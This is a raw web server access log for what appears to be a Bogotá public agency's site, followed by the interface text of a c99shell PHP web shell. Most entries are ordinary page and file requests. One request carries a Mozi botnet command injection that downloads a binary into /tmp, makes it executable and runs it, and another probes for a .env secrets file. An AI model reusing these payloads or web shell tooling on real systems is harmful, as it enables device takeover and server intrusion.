172.22.2.4 - - [08/Jun/2022:22:38:07 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [08/Jun/2022:22:38:23 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [08/Jun/2022:22:38:38 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [08/Jun/2022:22:38:44 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [08/Jun/2022:22:38:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [08/Jun/2022:22:38:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [08/Jun/2022:22:38:44 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [08/Jun/2022:22:38:44 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [08/Jun/2022:22:38:44 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [08/Jun/2022:22:38:49 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [08/Jun/2022:22:38:50 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [08/Jun/2022:22:38:58 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 310723
172.22.2.4 - - [08/Jun/2022:22:38:59 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [08/Jun/2022:22:38:59 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:22:38:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [08/Jun/2022:22:39:33 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [08/Jun/2022:22:39:43 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [08/Jun/2022:22:38:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.248.128.75 - - [08/Jun/2022:22:40:21 -0500] "GET /BLA/resoluciones/AUTOS%202022/6018.pdf HTTP/1.1" 200 348181
172.22.2.4 - - [08/Jun/2022:22:38:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44530
172.22.2.4 - - [08/Jun/2022:22:39:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50194
186.83.163.72 - - [08/Jun/2022:22:41:14 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.83.163.72 - - [08/Jun/2022:22:41:16 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
186.83.163.72 - - [08/Jun/2022:22:41:16 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
186.83.163.72 - - [08/Jun/2022:22:41:16 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
186.83.163.72 - - [08/Jun/2022:22:41:16 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
186.83.163.72 - - [08/Jun/2022:22:41:17 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.83.163.72 - - [08/Jun/2022:22:41:33 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
186.83.163.72 - - [08/Jun/2022:22:41:43 -0500] "POST /appsia/controlador HTTP/1.1" 200 7729
186.83.163.72 - - [08/Jun/2022:22:41:43 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
181.248.128.75 - - [08/Jun/2022:22:42:17 -0500] "GET /BLA/resoluciones/AUTOS%202022/3421.pdf HTTP/1.1" 200 416934
201.245.192.253 - - [08/Jun/2022:22:41:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46561
216.245.221.92 - - [08/Jun/2022:22:42:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Jun/2022:22:42:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47868
181.248.128.75 - - [08/Jun/2022:22:44:36 -0500] "GET /BLA/resoluciones/AUTOS%202022/3216.pdf HTTP/1.1" 200 401021
172.22.2.4 - - [08/Jun/2022:22:44:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.248.128.75 - - [08/Jun/2022:22:46:26 -0500] "GET /BLA/resoluciones/AUTOS%202022/2844.pdf HTTP/1.1" 200 297035
186.83.163.72 - - [08/Jun/2022:22:46:39 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
172.22.2.4 - - [08/Jun/2022:22:45:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
20.112.60.200 - - [08/Jun/2022:22:46:58 -0500] "GET /galeria/galeria/fotos/2CaminataG1.jpg HTTP/1.1" 200 168854
186.83.163.72 - - [08/Jun/2022:22:47:04 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
173.252.83.14 - - [08/Jun/2022:22:47:44 -0500] "GET /images/Naturalista1.jpeg HTTP/1.1" 200 202073
173.252.83.118 - - [08/Jun/2022:22:47:47 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
173.252.107.21 - - [08/Jun/2022:22:47:47 -0500] "GET /images/arbolado-bogota-mayo-13.jpg HTTP/1.1" 200 62568
173.252.83.6 - - [08/Jun/2022:22:47:48 -0500] "GET /images/ptar-alcaldesa-rio-bogota-12-mato.jpg HTTP/1.1" 200 40205
173.252.83.117 - - [08/Jun/2022:22:47:48 -0500] "GET /images/feria-servicios-12-mayo-principal.jpg HTTP/1.1" 200 44744
69.63.189.8 - - [08/Jun/2022:22:47:48 -0500] "GET /images/secretaria-rio-bogota-avances-12-mayo.jpg HTTP/1.1" 200 37281
69.171.249.8 - - [08/Jun/2022:22:47:52 -0500] "GET /images/Brasil1.jpeg HTTP/1.1" 200 27965
69.171.249.22 - - [08/Jun/2022:22:47:52 -0500] "GET /images/RCD1.jpg HTTP/1.1" 200 195843
69.171.249.6 - - [08/Jun/2022:22:47:52 -0500] "GET /images/feria-servicios-5-MAYO.jpg HTTP/1.1" 200 39759
31.13.127.9 - - [08/Jun/2022:22:47:56 -0500] "GET /images/operativos-residuos-peligrosos-25-ABRIL.jpg HTTP/1.1" 200 35345
173.252.83.21 - - [08/Jun/2022:22:47:58 -0500] "GET /images/feria-servicios-tramites-puente-aranda-21-abril.jpg HTTP/1.1" 200 28255
173.252.83.120 - - [08/Jun/2022:22:47:58 -0500] "GET /images/actividades-dia-tierra-22-abril.jpg HTTP/1.1" 200 77276
216.245.221.92 - - [08/Jun/2022:22:47:59 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.111 - - [08/Jun/2022:22:47:59 -0500] "GET /images/ecosistema-dia-internacional-tierra-21-abril.jpg HTTP/1.1" 200 30098
173.252.107.4 - - [08/Jun/2022:22:48:01 -0500] "GET /images/zapatos-negocios-8-abril.jpg HTTP/1.1" 200 25964
69.171.249.11 - - [08/Jun/2022:22:48:04 -0500] "GET /images/pieza-mujeres-reverdecen-4-abril.jpg HTTP/1.1" 200 48916
31.13.127.119 - - [08/Jun/2022:22:48:05 -0500] "GET /images/acopiadores-llantas-control-2-abril.jpeg HTTP/1.1" 200 34334
173.252.83.118 - - [08/Jun/2022:22:48:07 -0500] "GET /images/feria-servicios-cuidamos-bogota-31-marzo.jpg HTTP/1.1" 200 109745
69.171.249.12 - - [08/Jun/2022:22:48:08 -0500] "GET /images/estacion-monitoreo-usme-29-marzo.jpg HTTP/1.1" 200 30383
173.252.83.118 - - [08/Jun/2022:22:48:09 -0500] "GET /images/culebra-sabanera-bogota-26-marzo.jpg HTTP/1.1" 200 22555
69.171.249.9 - - [08/Jun/2022:22:48:10 -0500] "GET /images/jornada-llantaton-usaquen-bosa-25-marzo.jpg HTTP/1.1" 200 60391
69.63.184.116 - - [08/Jun/2022:22:48:11 -0500] "GET /images/feria-servicios-principal-24-marzo.jpg HTTP/1.1" 200 37032
69.63.184.1 - - [08/Jun/2022:22:48:11 -0500] "GET /images/negocios-verdes-emprendimientos-24-marzo.jpg HTTP/1.1" 200 54522
173.252.107.5 - - [08/Jun/2022:22:48:14 -0500] "GET /images/feria-servicios-ambiental-barrios-unidos-17-marzo.jpg HTTP/1.1" 200 58797
69.171.249.1 - - [08/Jun/2022:22:48:14 -0500] "GET /images/humedal-agua-lluvias-bogota-18-marzo.jpg HTTP/1.1" 200 146923
181.248.128.75 - - [08/Jun/2022:22:48:17 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.248.128.75 - - [08/Jun/2022:22:48:17 -0500] "GET /apple-touch-icon.png HTTP/1.1" 404 1120
181.248.128.75 - - [08/Jun/2022:22:48:18 -0500] "GET /BLA/resoluciones/AUTOS%202022/2844.pdf HTTP/1.1" 200 297035
181.248.128.75 - - [08/Jun/2022:22:48:18 -0500] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 1120
181.248.128.75 - - [08/Jun/2022:22:48:37 -0500] "GET /BLA/resoluciones/AUTOS%202022/2844.pdf HTTP/1.1" 206 100000
181.248.128.75 - - [08/Jun/2022:22:48:58 -0500] "GET /BLA/resoluciones/AUTOS%202022/3215.pdf HTTP/1.1" 200 416325
181.248.128.75 - - [08/Jun/2022:22:49:06 -0500] "GET /BLA/resoluciones/AUTOS%202022/2807.pdf HTTP/1.1" 200 339988
66.249.65.15 - - [08/Jun/2022:22:49:42 -0500] "-" 408 -
181.248.128.75 - - [08/Jun/2022:22:50:43 -0500] "GET /apple-touch-icon.png HTTP/1.1" 404 1120
181.248.128.75 - - [08/Jun/2022:22:50:43 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.248.128.75 - - [08/Jun/2022:22:50:43 -0500] "GET /BLA/resoluciones/AUTOS%202022/2844.pdf HTTP/1.1" 200 297035
181.248.128.75 - - [08/Jun/2022:22:50:43 -0500] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 1120
191.95.41.27 - - [08/Jun/2022:22:50:56 -0500] "GET /dia-mundial-del-medio-ambiente-con-3-500-beneficiarias-comienza-la-segunda-fase-de-mujeres-que-reverdecen.html HTTP/1.1" 200 845
181.248.128.75 - - [08/Jun/2022:22:51:18 -0500] "GET /apple-touch-icon.png HTTP/1.1" 404 1120
181.248.128.75 - - [08/Jun/2022:22:51:18 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.248.128.75 - - [08/Jun/2022:22:51:18 -0500] "GET /BLA/resoluciones/AUTOS%202022/2844.pdf HTTP/1.1" 200 297035
181.248.128.75 - - [08/Jun/2022:22:51:18 -0500] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 1120
172.22.2.4 - - [08/Jun/2022:22:50:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.248.128.75 - - [08/Jun/2022:22:52:03 -0500] "GET /BLA/resoluciones/AUTOS%202022/2737.pdf HTTP/1.1" 200 4577004
172.22.2.4 - - [08/Jun/2022:22:50:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58029
216.245.221.92 - - [08/Jun/2022:22:52:59 -0500] "HEAD / HTTP/1.1" 200 -
181.248.128.75 - - [08/Jun/2022:22:53:07 -0500] "GET /BLA/resoluciones/AUTOS%202022/2736.pdf HTTP/1.1" 200 4569249
181.248.128.75 - - [08/Jun/2022:22:53:37 -0500] "GET /BLA/resoluciones/AUTOS%202022/2212.pdf HTTP/1.1" 200 367610
172.22.2.4 - - [08/Jun/2022:22:54:18 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [08/Jun/2022:22:54:19 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
181.248.128.75 - - [08/Jun/2022:22:54:22 -0500] "GET /BLA/resoluciones/AUTOS%202022/2210.pdf HTTP/1.1" 200 382931
172.22.2.4 - - [08/Jun/2022:22:55:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [08/Jun/2022:22:57:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:22:56:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
191.156.137.230 - - [08/Jun/2022:22:59:30 -0500] "GET /dia-mundial-del-medio-ambiente-con-3-500-beneficiarias-comienza-la-segunda-fase-de-mujeres-que-reverdecen.html HTTP/1.1" 200 845
173.252.107.8 - - [08/Jun/2022:23:02:17 -0500] "GET /bogota-se-alista-para-la-feria-de-emprendimiento-verde.html HTTP/1.1" 206 862
173.252.107.5 - - [08/Jun/2022:23:02:17 -0500] "GET /bogota-se-alista-para-la-feria-de-emprendimiento-verde.html HTTP/1.1" 206 862
173.252.107.12 - - [08/Jun/2022:23:02:18 -0500] "GET /bogota-se-alista-para-la-feria-de-emprendimiento-verde.html HTTP/1.1" 206 862
173.252.107.119 - - [08/Jun/2022:23:02:19 -0500] "GET /images/Pieza-ruta-emprendimiento-verde-2-noviembre.jpg HTTP/1.1" 200 254875
173.252.79.18 - - [08/Jun/2022:23:02:19 -0500] "GET /images/Pieza-ruta-emprendimiento-verde-2-noviembre.jpg HTTP/1.1" 200 254875
86.147.215.109 - - [08/Jun/2022:23:02:26 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [08/Jun/2022:23:02:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:23:01:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:23:02:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57520
191.156.144.3 - - [08/Jun/2022:23:05:52 -0500] "GET /dia-mundial-del-medio-ambiente-con-3-500-beneficiarias-comienza-la-segunda-fase-de-mujeres-que-reverdecen.html HTTP/1.1" 200 845
216.245.221.92 - - [08/Jun/2022:23:07:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:23:07:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.91.112.108 - - [08/Jun/2022:23:09:56 -0500] "GET /galeria/galeria/fotos/humedal-Burro4G.jpg HTTP/1.1" 200 436973
172.22.2.4 - - [08/Jun/2022:23:08:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
157.55.39.43 - - [08/Jun/2022:23:12:15 -0500] "GET /bla/resoluciones/index.php?dir=notificaciones/registros%202020/&sort=date&order=desc HTTP/1.1" 200 17976
216.245.221.92 - - [08/Jun/2022:23:12:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:23:13:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
151.80.12.150 - - [08/Jun/2022:23:15:48 -0500] "GET /.env HTTP/1.1" 404 1018
151.80.12.150 - - [08/Jun/2022:23:15:48 -0500] "POST / HTTP/1.1" 200 319
172.22.2.4 - - [08/Jun/2022:23:14:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
216.245.221.92 - - [08/Jun/2022:23:17:59 -0500] "HEAD / HTTP/1.1" 200 -
191.156.60.90 - - [08/Jun/2022:23:18:17 -0500] "GET /dia-mundial-del-medio-ambiente-con-3-500-beneficiarias-comienza-la-segunda-fase-de-mujeres-que-reverdecen.html HTTP/1.1" 200 845
190.26.8.110 - - [08/Jun/2022:23:18:30 -0500] "GET /BLA/resoluciones/index.php?dir= HTTP/1.1" 200 13093
190.26.8.110 - - [08/Jun/2022:23:18:37 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 632181
172.22.2.4 - - [08/Jun/2022:23:19:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:23:20:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56776
45.238.183.119 - - [08/Jun/2022:23:21:55 -0500] "GET /dia-mundial-del-medio-ambiente-con-3-500-beneficiarias-comienza-la-segunda-fase-de-mujeres-que-reverdecen.html HTTP/1.1" 200 845
201.245.192.253 - - [08/Jun/2022:23:21:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46851
201.245.192.253 - - [08/Jun/2022:23:22:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [08/Jun/2022:23:22:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Jun/2022:23:22:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47840
172.22.2.4 - - [08/Jun/2022:23:25:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:23:25:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56364
216.245.221.92 - - [08/Jun/2022:23:27:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Jun/2022:23:31:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46851
172.22.2.4 - - [08/Jun/2022:23:30:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [08/Jun/2022:23:32:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Jun/2022:23:32:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47840
172.22.2.4 - - [08/Jun/2022:23:31:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
186.82.181.21 - - [08/Jun/2022:23:34:20 -0500] "-" 408 -
207.46.13.137 - - [08/Jun/2022:23:35:34 -0500] "GET /catalogoisis/js/remote.js HTTP/1.1" 200 436
40.77.167.21 - - [08/Jun/2022:23:36:46 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/4.%20EJECUCION%20DE%20RESERVAS%20ABRIL%202022.xlsx HTTP/1.1" 200 28626
172.22.2.4 - - [08/Jun/2022:23:35:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60581
216.245.221.92 - - [08/Jun/2022:23:37:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:23:36:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:23:37:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
172.22.2.4 - - [08/Jun/2022:23:39:29 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [08/Jun/2022:23:39:39 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
40.77.167.21 - - [08/Jun/2022:23:40:05 -0500] "GET /galeria/galeria/fotos/Soratama4G.jpg HTTP/1.1" 200 167128
42.234.157.235 - - [08/Jun/2022:23:40:21 -0500] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 946
201.245.192.253 - - [08/Jun/2022:23:41:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46851
216.245.221.92 - - [08/Jun/2022:23:42:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Jun/2022:23:42:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47840
172.22.2.4 - - [08/Jun/2022:23:42:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:23:43:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
216.245.221.92 - - [08/Jun/2022:23:47:59 -0500] "HEAD / HTTP/1.1" 200 -
191.108.29.79 - - [08/Jun/2022:23:48:33 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1/WezNeP0WgDC2v6YyWd0AZnIIrjqj4VZZXtjEBH9SmveNgq/Zgy30CyteVaT7Mzs0jWOoQbXx8j9FV7+L8mNnzOkxe9Nkpl7L7T+NN+zxBr2vZUcXvEy/PhhXfisqyAfzgziCCaueoew==&u=U2FsdGVkX1+HDP2h++5OLmxqex/xjJNGfmqzELSjQZWMh9y6BE5S0p7Nwvklg6zN&y=U2FsdGVkX18OYpGIkeuCmxHkXZ+gKHnGgSqJbl+z1uESDTUijwnS03/KLP8QoLqB HTTP/1.1" 200 60
172.22.2.4 - - [08/Jun/2022:23:49:44 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2026%20del%2028%20de%20diciembre%20de%202018.pdf HTTP/1.1" 304 -
207.46.13.137 - - [08/Jun/2022:23:49:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0306.pdf HTTP/1.1" 200 355739
172.22.2.4 - - [08/Jun/2022:23:48:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:23:49:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55576
216.245.221.92 - - [08/Jun/2022:23:52:59 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.17 - - [08/Jun/2022:23:55:14 -0500] "-" 408 -
172.22.2.4 - - [08/Jun/2022:23:54:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:23:55:58 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_ANALISIS%20JURISPRUDENCIA%20C-634-12%20DECOMISO.docx HTTP/1.1" 200 27045
157.55.39.43 - - [08/Jun/2022:23:56:10 -0500] "GET /bla/resoluciones/resoluciones%202007/res%202007%204101%20al%204200/RESOLUCION%204181%20DE%202007.pdf HTTP/1.1" 200 321820
172.22.2.4 - - [08/Jun/2022:23:55:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
216.245.221.92 - - [08/Jun/2022:23:57:59 -0500] "HEAD / HTTP/1.1" 200 -

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.7488 ]--